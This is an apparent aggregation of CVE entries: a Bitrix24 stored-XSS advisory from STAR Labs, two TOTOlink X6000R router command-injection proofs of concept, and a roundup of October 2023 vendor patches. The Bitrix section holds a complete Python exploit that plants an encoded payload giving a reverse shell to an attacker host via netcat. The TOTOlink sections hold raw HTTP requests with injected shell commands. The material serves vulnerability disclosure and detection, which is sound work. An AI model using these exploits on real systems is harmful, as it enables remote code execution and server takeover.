Incorrect security UI in Picture In Picture in Google Chrome prior to 119.0.6045.105 allowed a remote attacker to perform domain spoofing via a crafted local HTML page. (Chromium security severity: Low)

CVE-2023-5859: Stable Channel Update for Desktop


A logic error when using mb_strpos() to check for potential XSS payload in Bitrix24 22.0.300 allows attackers to bypass XSS sanitisation via placing HTML tags at the begining of the payload.







**Summary:**

**Product**

Bitrix24

**Vendor**

Bitrix24

**Severity**

Critical

**Affected Versions**

Bitrix24 22.0.300 (latest version as of writing)

**Tested Versions**

Bitrix24 22.0.300 (latest version as of writing)

**CVE Identifier**

CVE-2023-1715 & CVE-2023-1716

**CVE Description**

_(CVE-2023-1715)_: A logic error when using mb\_strpos() to check for potential XSS payload in Bitrix24 22.0.300 allows attackers to bypass XSS sanitisation via placing HTML tags at the begining of the payload. _(CVE-2023-1716)_: Cross-site scripting (XSS) vulnerability in Invoice Edit Page in Bitrix24 22.0.300 allows attackers to execute arbitrary JavaScript code in the victim’s browser, and possibly execute arbitrary PHP code on the server if the victim has administrator privilege.

**CWE Classification(s)**

CWE-83 Improper Neutralization of Script in Attributes in a Web Page

**CAPEC Classification(s)**

CAPEC-592 Stored XSS

**CVSS3.1 Scoring System:**

**Base Score:** 9.0 (Critical) **Vector String:** CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H

**Metric**

**Value**

**Attack Vector (AV)**

Network

**Attack Complexity (AC)**

Low

**Privileges Required (PR)**

Low

**User Interaction (UI)**

Required

**Scope (S)**

Changed

**Confidentiality (C)**

High

**Integrity (I)**

High

**Availability (A)**

High

**Vulnerability Details:**

This report presents information on a Cross Site Scripting (XSS) vulnerability in Bitrix24’s Invoice Edit page that allows an attacker to run arbitrary JavaScript code on the browser of any victim that visits the affected page. If the victim has administrator permissions, an attacker may leverage the built-in “PHP Command Line” feature to execute arbitrary system commands on the target web server.

Authorized users may edit an invoice they have access to via the crm.invoice.edit component, located at bitrix/components/bitrix/crm.invoice.edit/component.php and accessible via a post request to https://TARGET_HOST/bitrix/urlrewrite.php?SEF_APPLICATION_CUR_PAGE_URL=/crm/invoice/edit/INVOICE_ID/.

One of the fields that can be supplied by an attacker is the USER_DESCRIPTION field. As this field is rendered as HTML by a rich text editor in the frontend, sanitization is performed on this field to prevent XSS:

    // bitrix/components/bitrix/crm.invoice.edit/component.php lines 746 to 763
    
    $userDescription = trim($_POST['USER_DESCRIPTION']);
    $bSanitizeUserDescription = ($userDescription !== '' && mb_strpos($userDescription, '<')); // [1]
    if($bSanitizeComments || $bSanitizeUserDescription)
    {
        $sanitizer = new CBXSanitizer();
        $sanitizer->ApplyDoubleEncode(false);
        $sanitizer->SetLevel(CBXSanitizer::SECURE_LEVEL_MIDDLE);
        //Crutch for for Chrome line break behaviour in HTML editor.
        $sanitizer->AddTags(array('div' => array()));
        $sanitizer->AddTags(array('a' => array('href', 'title', 'name', 'style', 'alt', 'target')));
        $sanitizer->AddTags(array('p' => array()));
        $sanitizer->AddTags(array('span' => array('style')));
        if ($bSanitizeComments)
            $comments = $sanitizer->SanitizeHtml($comments);
        if ($bSanitizeUserDescription)
            $userDescription = $sanitizer->SanitizeHtml($userDescription);
        unset($sanitizer);
    }
    

The mb_strpos($userDescription, '<') check ([1]) is supposed to check if the user description contains the < character, which could indicate that this field contains HTML tags and thus requires sanitization. However, if the < character is the first character, mb_strpos($userDescription, '<') would be 0, resulting in $bSanitizeUserDescription being false. Thus, sanitization of this field can be completely bypassed.

The $userDescription field is subsequently saved to the database, along with the rest of the invoice data.

However, the built-in Bitrix XSS sanitizer, applied to the body parameters of every request, complicates exploitation of this vulnerability.

The XSS sanitizer uses several regular expressions (regex) to identify and sanitize potentially dangerous input. One of these aims to target HTML event handlers, which could lead to XSS. The regex used can be found in bitrix/modules/security/lib/filter/auditor/xss.php on line 173, and a simplified version is shown below:

    /(on[a-z]*)([a-z]{3}[\s]*=)/is
    

The regex aims to identify patterns such as onerror= and uses two capturing groups to split the dangerous string into two parts. A space is then added between the two parts, neutralizing the event handler. For example, onerror= would be transformed into oner ror=. Note that the regex allows any amount of whitespace between the event handler name (eg onerror) and the equals sign (=). This is compliant with the HTML specification. On its own, this sanitizer is secure.

When an authorized user navigates to the invoice edit page, the stored invoice is retrieved. The user description field is then passed to the CLightHTMLEditor class as the content to be edited.

The configuration for this editor, including the content, is injected into the JavaScript context after sanitization by the CUtil::PhpToJSObject function.

    <script>
    // ...
    // bitrix/modules/fileman/classes/general/light_editor.php line 254
    top.<?=$this->jsObjName?> = window.<?=$this->jsObjName?> = new window.JCLightHTMLEditor(<?=CUtil::PhpToJSObject($this->JSConfig)?>);
    // ...
    </script>
    

The CUtil::PhpToJSObject function calls the CUtil::JSEscape function (shown below) on the value of each key-value pair in the $this->JSConfig array.

    // bitrix/modules/main/tools.php lines 4349 to 4355
    
    public static function JSEscape($s){
        static $aSearch = array("\xe2\x80\xa9", "\\", "'", "\"", "\r\n", "\r", "\n", "\xe2\x80\xa8", "*/", "</");
        static $aReplace = array(" ", "\\\\", "\\'", '\\"', "\n", "\n", "\\n", "\\n", "*\\/", "<\\/");
        $val = str_replace($aSearch, $aReplace, $s);
        return $val;
    }
    

This function performs a simple string replacement on the input string $s to ensure that it does not contain any characters that may break out of a JavaScript string, such as ", ' or \.

Notably, this function replaces the byte string \xe2\x80\xa9 (U+2029 Unicode Paragraph Separator) with a regular space (U+0020 Space).

This is a significant transformation as the Bitrix XSS sanitizer does not regard the byte string \xe2\x80\xa9 as whitespace. Therefore, the string onerror\xe2\x80\xa9= would not be sanitized. However, CUtil::JSEscape would transform the string into onerror =, which is a valid HTML onerror event handler.

After sanitization and transformation by CUtil::JSEscape, the constructor of the JavaScript class JCLightHTMLEditor injects the content to be edited into HTML:

    // bitrix/js/fileman/light_editor/le_core.js lines 616 to 618
    
    this.pEditorDocument.open();
    this.pEditorDocument.write('<html><head></head><body>' + sContent + '</body></html>');
    this.pEditorDocument.close();
    

Therefore, a malicious attacker may create an invoice with user description <img src=x onerror\xe2\x80\xa9=alert(document.domain)>. As < is the first character in the string, sanitization in bitrix/components/bitrix/crm.invoice.edit/component.php is bypassed. Additionally, as onerror\xe2\x80\xa9= does not match the regex for an event handler, the built-in XSS sanitizer does not sanitize this string. Finally CUtil::JSEscape replaces \xe2\x80\xa9 with , resulting in <img src=x onerror =alert(document.domain)>. This string is then injected into HTML, resulting in XSS.

**Proof-of-Concept:**

We have tried our best to make the PoC as portable as possible. This report includes a functional exploit written in Python3 that edits an existing invoice to inject malicious HTML in the user description field.

A sample exploit script is shown below:

    # Bitrix24 Invoice Edit Page XSS RCE (CVE-2023-XXXXX)
    # Via: https://TARGET_HOST/crm/invoice/edit/XXXX
    # Author: Lam Jun Rong (STAR Labs SG Pte. Ltd.)
    
    #!/usr/bin/env python3
    import base64
    
    import requests
    import re
    import os
    import typing
    import subprocess
    import threading
    
    HOST = "http://localhost:8000"
    SITE_ID = "s1"
    USERNAME = "user"
    PASSWORD = "abcdef"
    
    TARGET_INVOICE_ID = 3
    
    LPORT = 9001
    LHOST = "192.168.86.43"
    
    PROXY = {"http": "http://localhost:8080"}
    
    
    def nested_to_urlencoded(val: typing.Any, prefix="") -> dict:
        out = dict()
        if type(val) is dict:
            for k, v in val.items():
                child = nested_to_urlencoded(v, prefix=(k if prefix == "" else f"[{k}]"))
                for key, val in child.items():
                    out[prefix + key] = val
        elif type(val) in [list, tuple]:
            for i, item in enumerate(val):
                child = nested_to_urlencoded(item, prefix=f"[{i}]")
                for key, val in child.items():
                    out[prefix + key] = val
        else:
            out[prefix] = val
        return out
    
    
    def dict_to_str(d):
        return "&".join(f"{k}={v}" for k, v in d.items())
    
    
    def check_creds(cookie, sessid):
        return requests.get(HOST + "/bitrix/tools/public_session.php", headers={
            "X-Bitrix-Csrf-Token": sessid
        }, cookies={
            "PHPSESSID": cookie,
        }, proxies=PROXY).text == "OK"
    
    
    def login(session, username, password):
        if os.path.isfile("./cached-creds.txt"):
            cookie, sessid = open("./cached-creds.txt").read().split(":")
            if check_creds(cookie, sessid):
                session.cookies.set("PHPSESSID", cookie)
                print("[+] Using cached credentials")
                return sessid
            else:
                print("[!] Cached credentials are invalid")
        session.get(HOST + "/")
        resp = session.post(
            HOST + "/?login=yes",
            data={
                "AUTH_FORM": "Y",
                "TYPE": "AUTH",
                "backurl": "/",
                "USER_LOGIN": username,
                "USER_PASSWORD": password,
            },
        )
        if session.cookies.get("BITRIX_SM_LOGIN", "") == "":
            print(f"[!] Invalid credentials")
            exit()
        sessid = re.search(re.compile("'bitrix_sessid':'([a-f0-9]{32})'"), resp.text).group(
            1
        )
        print(f"[+] Logged in as {username}")
        with open("./cached-creds.txt", "w") as f:
            f.write(f"{session.cookies.get('PHPSESSID')}:{sessid}")
        return sessid
    
    
    def edit_invoice(session: requests.Session, sessid):
        payload = base64.b64encode("""
        fetch("/bitrix/admin/php_command_line.php?lang=en&"+window.parent.document.body.innerHTML.match(/sessid=[a-f0-9]{32}/)[0],{
            method:"POST",
            headers:{
              'Content-Type': 'application/x-www-form-urlencoded'
            },    
            body: new URLSearchParams({
                query: `$sock=fsockopen("LHOST",LPORT);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);`,
                ajax: "y",
                result_as_text:"N"
            })
        })
        """.replace("LHOST", LHOST).replace("LPORT", str(LPORT)).encode())
        session.post(
            HOST + f"/bitrix/urlrewrite.php?SEF_APPLICATION_CUR_PAGE_URL=%2Fcrm%2Finvoice%2Fedit%2F{TARGET_INVOICE_ID}%2F",
            headers={
                "Content-Type": "application/x-www-form-urlencoded",
            },
            data={
                "sessid": sessid,
                "CRM_INVOICE_EDIT_V12_active_tab": "tab_1",
                "ACCOUNT_NUMBER": TARGET_INVOICE_ID,
                "ORDER_TOPIC": "sss",
                "STATUS_ID": "N",
                "PAY_VOUCHER_DATE": "",
                "PAY_VOUCHER_NUM": "",
                "REASON_MARKED_SUCCESS": "",
                "DATE_MARKED": "",
                "REASON_MARKED": "",
                "PRIMARY_ENTITY_TYPE": "COMPANY",
                "PRIMARY_ENTITY_ID": "1",
                "SECONDARY_ENTITY_IDS": "7",
                "REQUISITE_ID": "0",
                "BANK_DETAIL_ID": "0",
                "PAY_SYSTEM_ID": "1",
                "UF_MYCOMPANY_ID": "0",
                "MC_REQUISITE_ID": "0",
                "MC_BANK_DETAIL_ID": "0",
                "RECUR_PARAM[PERIOD]": "1",
                "RECUR_PARAM[DAILY_INTERVAL_DAY]": "1",
                "RECUR_PARAM[DAILY_WORKDAY_ONLY]": "N",
                "RECUR_PARAM[WEEKLY_INTERVAL_WEEK]": "1",
                "RECUR_PARAM[WEEKLY_WEEK_DAYS][]": "1",
                "RECUR_PARAM[MONTHLY_TYPE]": "1",
                "RECUR_PARAM[MONTHLY_INTERVAL_DAY]": "1",
                "RECUR_PARAM[MONTHLY_WORKDAY_ONLY]": "N",
                "RECUR_PARAM[MONTHLY_MONTH_NUM_1]": "1",
                "RECUR_PARAM[MONTHLY_WEEKDAY_NUM]": "0",
                "RECUR_PARAM[MONTHLY_WEEK_DAY]": "1",
                "RECUR_PARAM[MONTHLY_MONTH_NUM_2]": "1",
                "RECUR_PARAM[YEARLY_TYPE]": "1",
                "RECUR_PARAM[YEARLY_INTERVAL_DAY]": "1",
                "RECUR_PARAM[YEARLY_WORKDAY_ONLY]": "N",
                "RECUR_PARAM[YEARLY_MONTH_NUM_1]": "1",
                "RECUR_PARAM[YEARLY_WEEK_DAY_NUM]": "0",
                "RECUR_PARAM[YEARLY_WEEK_DAY]": "1",
                "RECUR_PARAM[YEARLY_MONTH_NUM_2]": "1",
                "RECUR_PARAM[START_DATE]": "",
                "RECUR_PARAM[REPEAT_TILL]": "",
                "RECUR_PARAM[END_DATE]": "",
                "RECUR_PARAM[LIMIT_REPEAT]": "0",
                "RECUR_PARAM[DATE_PAY_BEFORE_TYPE]": "0",
                "RECUR_PARAM[DATE_PAY_BEFORE_COUNT]": "0",
                "RECUR_PARAM[DATE_PAY_BEFORE_PERIOD]": "1",
                "RECUR_PARAM[RECURRING_EMAIL_ID]": "22",
                "COMMENTS": "",
                "USER_DESCRIPTION": b"<img src=x onerror\xe2\x80\xa9=eval(atob('"+payload+b"'))>",
                "INVOICE_PRODUCT_DATA": "[{\"ID\":0,\"PRODUCT_NAME\":\"Bitrix Site Manager\",\"PRODUCT_ID\":23,\"QUANTITY\":\"1.0000\",\"MEASURE_CODE\":796,\"MEASURE_NAME\":\"pcs.\",\"PRICE\":\"0.00\",\"PRICE_EXCLUSIVE\":\"0.00\",\"PRICE_NETTO\":\"0.00\",\"PRICE_BRUTTO\":\"0.00\",\"DISCOUNT_TYPE_ID\":1,\"DISCOUNT_RATE\":\"0.00\",\"DISCOUNT_SUM\":\"0.00\",\"TAX_RATE\":\"0.00\",\"TAX_INCLUDED\":\"N\",\"CUSTOMIZED\":\"Y\",\"SORT\":10}]",
                "INVOICE_PRODUCT_DATA_SETTINGS": "{\"ENABLE_DISCOUNT\": \"N\",\"ENABLE_TAX\": \"N\"}",
                "saveAndView": "Save",
                "invoice_id": TARGET_INVOICE_ID
            }
        )
        print(f"[+] Edited invoice {TARGET_INVOICE_ID}")
    
    
    if __name__ == "__main__":
        s = requests.Session()
        s.proxies = PROXY
        sessid = login(s, USERNAME, PASSWORD)
        edit_invoice(s, sessid)
        print(f"[+] Visit this URL as admin to execute attack: {HOST}/crm/invoice/edit/{TARGET_INVOICE_ID}/")
        print("[+] Waiting for reverse shell connection")
        subprocess.run(["nc", "-nvlp", str(LPORT)])
    

**Exploit Conditions:**

This vulnerability can be exploited when the attacker has access to the CRM feature and permission to create and export contacts. This level of access may be granted if the user is in the management board group.

**Detection Guidance:**

It is possible to detect the exploitation of this vulnerability by examining traffic logs to detect the presence of the byte string \xe2\x80\xa9 in request bodies. The presence of this string together with other characters like < and = indicate possible exploitation of this vulnerability.

**Credits**

Lam Jun Rong & Li Jiantao of of STAR Labs SG Pte. Ltd. (@starlabs\_sg)

**Timeline**

*   2023-03-17 Initial Vendor Contact via https://www.bitrix24.com/report/
*   2023-03-18 No reply from vendor, tried using the form again
*   2023-03-21 Email to \[email protected\]
*   2023-03-21 Email to \[email protected\]
*   2023-03-24 Got reply from \[email protected\], they asked us to email to \[email protected\] or use the form at https://www.bitrix24.com/report/ with regards to the bug reports
*   2023-03-29 Emailed to \[redacted\], \[redacted\] & \[redacted\]. Team member found the 3 email addresses via an \[USA bug bounty platform\]
*   2023-03-30 \[redacted\] replied to us
*   2023-03-31 \[redacted\] wanted us to report the bugs via that \[USA bug bounty platform\]
*   2023-03-31 Emailed back to \[redacted\] that we are unable to do so because it’s a private program in that \[USA bug bounty platform\]
*   2023-03-31 \[redacted\] emailed back with the invite
*   2023-03-31 Submitted the reports via that \[USA bug bounty platform\]
*   2023-03-31 Informed \[redacted\] again that we are unable to report all the bugs due to \[blah blah blah Requirements\]
*   2023-04-03 \[redacted\] replied that they had remove the \[blah blah blah Requirements\] limitations for us
*   2023-04-04 We submitted the final 2 reports
*   2023-06-21 \[redacted\] emailed us “Generally, we prefer not to publish CVE, because our clients tend to postpone or skip even critical updates, and hackers definitely will be using this information for attacking our clients. It have happened several times in the past, with huge consequences for our company and for our clients. To tell the truth, I would like to set award on \[USA bug bounty platform\] instead of CVE publishing. Please let me know what do you think about that.”
*   2023-06-23 Emailed back to Bitrix that we prefer to publish the CVE and do not want the reward. We are also willing to delay the publication at a mutually agreed date.
*   2023-09-22 \[redacted\] finally replied asking us if we are agreeable to publish the CVE in November 2023
*   2023-09-22 Emailed back that we are agreeable to delay the publication to 1st November 2023
*   2023-09-22 \[redacted\] accepted the date
*   2023-11-01 Public Release

CVE-2023-1715: (CVE-2023-1715 & CVE-2023-1716) Bitrix24 Stored Cross-Site Scripting (XSS) via Improper Input Neutralization on Invoice Edit Page

An issue in TOTOlink X6000R V9.4.0cu.852_B20230719 allows a remote attacker to execute arbitrary code via the setTracerouteCfg function of the stecgi.cgi component.

**TOTOlink X6000R V9.4.0cu.852\_B20230719 command injection****Produce information**

Device：TOTOlink X6000R  
Firmware version：V9.4.0cu.852\_B20230719  
Manufacturer’s website information：https://www.totolink.net/  
The firmware download address：https://www.totolink.net/home/menu/detail/menu\_listtpl/download/id/247/ids/36.html

**Vulnerability description**

Arbitrary command execution exists on the setTracerouteCfg interface of cstecgi .cgi

**poc**

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  
11  
12  
13  
14  

    POST /cgi-bin/cstecgi.cgi HTTP/1.1Host: 172.28.60.132Content-Length: 76Accept: application/json, text/javascript, */*; q=0.01X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Origin: http://172.28.60.132Referer: http://172.28.60.132/advance/diagnosis.html?time=1694021202884Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close{"command":"127.0.0.1|ls>/web/test2.txt|","num":"1","topicurl":"setTracerouteCfg"}

Inject the command “ls>/web/tes2t.txt”

Injection result:

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  

    GET /test3.txt HTTP/1.1Host: 172.28.60.132Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close

**Analyse**

The function in the shttp

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  
11  
12  
13  
14  
15  
16  
17  

    __int64 __fastcall sub_415950(__int64 a1, __int64 a2){  const char *v4; // x22  const char *v5; // x0  unsigned int v6; // w0  char s[256]; // [xsp+38h] [xbp+38h] BYREF  memset(s, 0, sizeof(s));  v4 = (const char *)sub_40BD6C(a1, "command");  v5 = (const char *)sub_40BD6C(a1, "num");  v6 = atoi(v5);  if ( (unsigned int)(snprintf(s, 0x100uLL, "traceroute -m %d %s&>/var/log/traceRouteLog", v6, v4) + 1) > 0x100 )    __break(0x3E8u);  CsteSystem(s, 0LL);  sub_40BDA0(a2, 1LL, "", 0LL, "0", "reserv");  return 0LL;}

There is a command splicing that bypasses execution without any filtering!

CVE-2023-46485: TOTOlink X6000R command injection(setTracerouteCfg)

An issue in TOTOlink X6000R V9.4.0cu.852_B20230719 allows a remote attacker to execute arbitrary code via the setLedCfg function.

**TOTOlink X6000R command injection****Product Information**

Device: TOTOlink X6000R  
Firmware version: V9.4.0cu.852\_B20230719  
Manufacturer’s website information：https://www.totolink.net/  
The firmware download address：https://www.totolink.net/home/menu/detail/menu\_listtpl/download/id/247/ids/36.html

**Vulnerability description**

There is arbitrary command execution on the setLedCfg interface of cstecgi .cgi

**poc**

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  
11  
12  
13  
14  

    POST /cgi-bin/cstecgi.cgi HTTP/1.1Host: 172.28.60.132Content-Length: 55Accept: application/json, text/javascript, */*; q=0.01X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Origin: http://172.28.60.132Referer: http://172.28.60.132/basic/qos.html?time=1694023460381Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close{"enable":"`ls>/web/test5.txt`","topicurl":"setLedCfg"}

Inject commands： “ls>/web/test5.txt”

Test results.

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  

    GET /test5.txt HTTP/1.1Host: 172.28.60.132Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close

**Analysis**

The following functions in shttp

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  
11  
12  
13  
14  
15  
16  
17  

    __int64 __fastcall sub_411F90(__int64 a1, __int64 a2){  const char *v3; // x20  unsigned int v4; // w19  v3 = (const char *)sub_40BD6C(a1, "enable");  v4 = atoi(v3);  if ( *v3 && v4 <= 1 )  {    Uci_Set_Str(11LL, "main", "led_status", v3);    Uci_Commit(11LL);    set_led_status(v4);  }  datconf_set_by_key("/var/cste/temp_status", "mesh_update", "1");  sub_40BDA0(a2, 1LL, "", 0LL, "0", "reserv");  return 0LL;}

There is an enable variable command splicing to bypass the execution, without any filtering!

The root cause comes from the following

Since the Uci\_Set\_Str function command arguments of the libcscommon.so library in shttpd are susceptible to operating system command injection. When the program calls get\_uci2json, it will call Uci\_Set\_Str in the so library, causing arbitrary command execution, and the permissionless operation of the interface setLanguageCfg leads to unauthorized arbitrary command execution.

In this part of shttpd, the relevant language settings are called

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  
11  
12  
13  
14  
15  
16  
17  
18  
19  
20  
21  
22  
23  
24  
25  
26  
27  
28  
29  
30  
31  
32  
33  
34  
35  
36  
37  
38  
39  
40  
41  
42  
43  
44  
45  
46  
47  
48  
49  
50  
51  
52  
53  
54  
55  

    __int64 __fastcall sub_4117F8(__int64 a1, __int64 a2){  const char *v4; // x22  const char *v5; // x23  int v6; // w0  int v8; // [xsp+44h] [xbp+44h] BYREF  char s[8]; // [xsp+48h] [xbp+48h] BYREF  __int64 v10; // [xsp+50h] [xbp+50h]  __int64 v11; // [xsp+58h] [xbp+58h]  __int64 v12; // [xsp+60h] [xbp+60h]  __int64 v13; // [xsp+68h] [xbp+68h]  __int64 v14; // [xsp+70h] [xbp+70h]  __int64 v15; // [xsp+78h] [xbp+78h]  __int64 v16; // [xsp+80h] [xbp+80h]  __int64 v17[8]; // [xsp+88h] [xbp+88h] BYREF  v4 = (const char *)sub_40BD6C(a1, "lang");  v5 = (const char *)sub_40BD6C(a1, "langAutoFlag");  v8 = 0;  *(_QWORD *)s = 0LL;  v10 = 0LL;  v11 = 0LL;  v12 = 0LL;  v13 = 0LL;  v14 = 0LL;  v15 = 0LL;  v16 = 0LL;  memset(v17, 0, sizeof(v17));  Uci_Set_Str();  Uci_Get_Int(11LL, "main", "lang_auto_flag", &v8);  v6 = atoi(v5);  if ( v6 != v8 )    Uci_Set_Str();  Uci_Commit(11LL);  snprintf(s, 0x40uLL, "helpurl_%s", v4);  Uci_Get_Str(15LL, "custom", s, v17);  if ( LOBYTE(v17[0]) )  {    *(_QWORD *)s = 0LL;    v10 = 0LL;    v11 = 0LL;    v12 = 0LL;    v13 = 0LL;    v14 = 0LL;    v15 = 0LL;    v16 = 0LL;    snprintf(s, 0x40uLL, "http://%s", (const char *)v17);  }  else  {    strcpy(s, "");  }  sub_40BDA0(a2, 1LL, "", 0LL, "0", s);  return 0LL;}

现在来看libcscommon.so

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  
11  
12  
13  
14  
15  

    ABEL_57:  while ( 1 )  {    off_2AB30(v12, 1024LL, "uci -c %s set %s.%s.%s=\"%s\"", v9, v10, a2, a3, a4);    off_2AD78(v12, 0LL);    result = 1LL;LABEL_58:    if ( v13 == *(_QWORD *)off_2A970 )      break;    off_2AC18();LABEL_60:    v9 = "/tmp/cste/";    v10 = "system_status";  }  return result;

The off\_2AD78 of them is LOAD:000000000002AD78 18 60 00 00 00 00 00 00 off\_2AD78 DCQ CsteSystem

That is, system

CVE-2023-46484: TOTOlink X6000R command injetction (setLedCfg)

Plus: Major vulnerability fixes are now available for a number of enterprise giants, including Cisco, VMWare, Citrix, and SAP.

October has been a security flaw-fest, with Apple, Microsoft, and Google issuing patches for vulnerabilities that are being used in real-life attacks. There were also multiple enterprise fixes during the month, with Cisco, VMWare, and Citrix fixing serious security bugs.

Some of the patches are more urgent than others, so read on to find out what you need to know about the updates released in October.

Apple iOS and iPad OS

October was a busy month for Apple, with the iPhone maker issuing its second set of fixes as part of iOS 17.1 at the end of the month. The two dozen security fixes in iOS 17.1 include patches for serious flaws in the Kernel at the heart of the iOS operating system and WebKit, the engine that underpins the Safari browser.

Tracked as CVE-2023-42849, the Kernel issue fixed in iOS 17.1 could allow an attacker that has already achieved code execution to bypass memory mitigations, Apple said on its support page. The three WebKit flaws—tracked as CVE-2023-40447, CVE-2023-41976, and CVE-2023-42852—could lead to arbitrary code execution.

Apple has also issued iOS and iPad OS 16.7.2, fixing the same flaws for users of older devices or those who don’t want to upgrade right away. They came alongside macOS Sonoma 14.1, macOS Ventura 13.6, macOS Monterey 12.7.1, tvOS 17.1, WatchOS 10.1, and Safari 17.1.

Earlier this month, Apple released iOS 17.0.3 and iOS 16.7.1, fixing issues being used in real-life attacks. Tracked as CVE-2023-42824, the first is a Kernel bug that could allow an attacker with access to your device to elevate their privileges.

Apple also fixed CVE-2023-5217, a buffer overflow flaw that could allow an attacker to execute code. Affecting multiple browsers and platforms, the bug has already been patched in Google’s Chrome browser.

Microsoft

Microsoft’s Patch Tuesday has seen the tech giant fix over 100 flaws, including two zero-day vulnerabilities in Microsoft WordPad and Skype for Business.

CVE-2023-36563 is an information disclosure bug in the WordPad word processing program that could expose NTLM hashes and result in NTLM relay attacks. However, it requires user interaction: The attacker must send someone a malicious file and convince them to open it, Microsoft said.

CVE-2023-41763 is an elevation of privilege vulnerability in Skype for Business. “An attacker could make a specially crafted network call to the target Skype for Business server, which could cause the parsing of an http request made to an arbitrary address,” potentially disclosing IP addresses or port numbers, Microsoft said.

Microsoft also patched a flaw in Message Queuing tracked as CVE-2023-35349 with a CVSS critical score of 9.8, which could allow an unauthenticated attacker to remotely execute code.

October’s Patch Tuesday is a particularly urgent one, so it’s important to update as soon as you can.

Google Chrome

Google has released 20 security fixes for its Chrome browser, including one patch for a flaw rated as critical. Tracked as CVE-2023-5218, the bug is a use-after-free issue in Site Isolation. Another six fixes cover inappropriate implementation vulnerabilities marked as having medium impact, while CVE-2023-5476 is a use-after-free flaw in Blink History. Another issue, CVE-2023-5474, is a heap buffer overflow in PDF, according to Google’s blog.

A further four inappropriate implementation vulnerabilities are rated as having a low impact, with Google also fixing a low severity use-after-free bug in Cast tracked as CVE-2023-5473.

None of the flaws fixed in October have been exploited, but given how actively the browser is targeted, it makes sense to update as soon as you can.

Google Android

Google’s October Android update was a major one because it fixed 53 issues, including two vulnerabilities already being used in real-life attacks. The first is CVE-2023-4863, a heap buffer overflow bug in libwebp affecting the applications that use the library to encode and decode images in the WebP format. This vulnerability impacts many applications and could be used to install spyware, security firm Malwarebytes wrote in a blog.

There are indications that the bug “may be under limited, targeted exploitation,” Google said in an advisory.

CVE-2023-4211 is an issue in Arm components rated as having a high impact, which Google said is also being used in attacks. “A local non-privileged user can make improper GPU memory processing operations to gain access to already freed memory,” Malwarebytes said, adding that the vulnerability affects multiple versions of Arm Mali GPU drivers. These are used in multiple Android device models, including those made by Google, Samsung, Huawei, and Xiaomi.

Another scary flaw in the System tracked as CVE-2023-40129 is rated as critical. “The \[vulnerability\] could lead to remote code execution with no additional execution privileges needed,” Google said.

The update is available for Google’s Pixel and Samsung’s Galaxy series, so if you have an Android device, check your settings ASAP.

Cisco

Software giant Cisco has released patches to fix two already exploited flaws. Tracked as CVE-2023-20198 and with an eye-watering CVSS score of 10, the first is an issue in the web user interface feature of Cisco IOS XE software. It affects physical and virtual devices running Cisco IOS XE software that also have the HTTP or HTTPS Server feature enabled, researchers at Cisco Talos said in a blog.

“Successful exploitation of CVE-2023-20198 allows an attacker to gain privilege level 15 access to the device, which the attacker can then use to create a local user and log in with normal user access,” the researchers warned.

The attacker can use the new unauthorized local user account to exploit a second vulnerability, CVE-2023-20273, in another component of the WebUI feature. “This allows the adversary to inject commands with elevated root privileges, giving them the ability to run arbitrary commands on the device,” said Talos Intelligence, Cisco’s cybersecurity firm.

Cisco “strongly recommends that customers disable the HTTP Server feature on all internet-facing systems or restrict its access to trusted source addresses,” the firm wrote in an advisory.

VMWare

VMWare has patched two out-of-bounds write and information disclosure vulnerabilities in its vCenter Server. Tracked as CVE-2023-34048, the first is a vulnerability in the implementation of the DCERPC protocol that could lead to remote code execution. VMware has rated the flaw as critical with a CVSS base score of 9.8.

At the other end of the CVSS scale but still worth mentioning is CVE-2023-34056, a partial information disclosure bug with a score of 4.3. “A malicious actor with non-administrative privileges to vCenter Server may leverage this issue to access unauthorized data,” VMWare wrote in an advisory.

Citrix

Enterprise software firm Citrix has issued urgent fixes for vulnerabilities in NetScaler ADC (formerly Citrix ADC) and NetScaler Gateway (formerly Citrix Gateway). Tracked as CVE-2023-4966 and with a CVSS score of 9.4, the first bug could allow an attacker to expose sensitive information.

CVE-2023-4967 is a denial of service issue with a CVSS score of 8.2. Exploits of CVE-2023-4966 on unmitigated appliances “have been observed,” Citrix said. “Cloud Software Group strongly urges customers of NetScaler ADC and NetScaler Gateway to install the relevant updated versions of NetScaler ADC and NetScaler Gateway as soon as possible.”

SAP

SAP’s October Security Patch Day saw the release of seven new security notes, all of which were rated as having a medium impact. Tracked as CVE-2023-42474, the worst flaw is a cross-site scripting vulnerability in SAP BusinessObjects Web Intelligence with a CVSS score of 6.8.

With only nine new and updated security notes, SAP’s October Patch Day “belongs to the calmest of the last five years,” security firm Onapsis said.

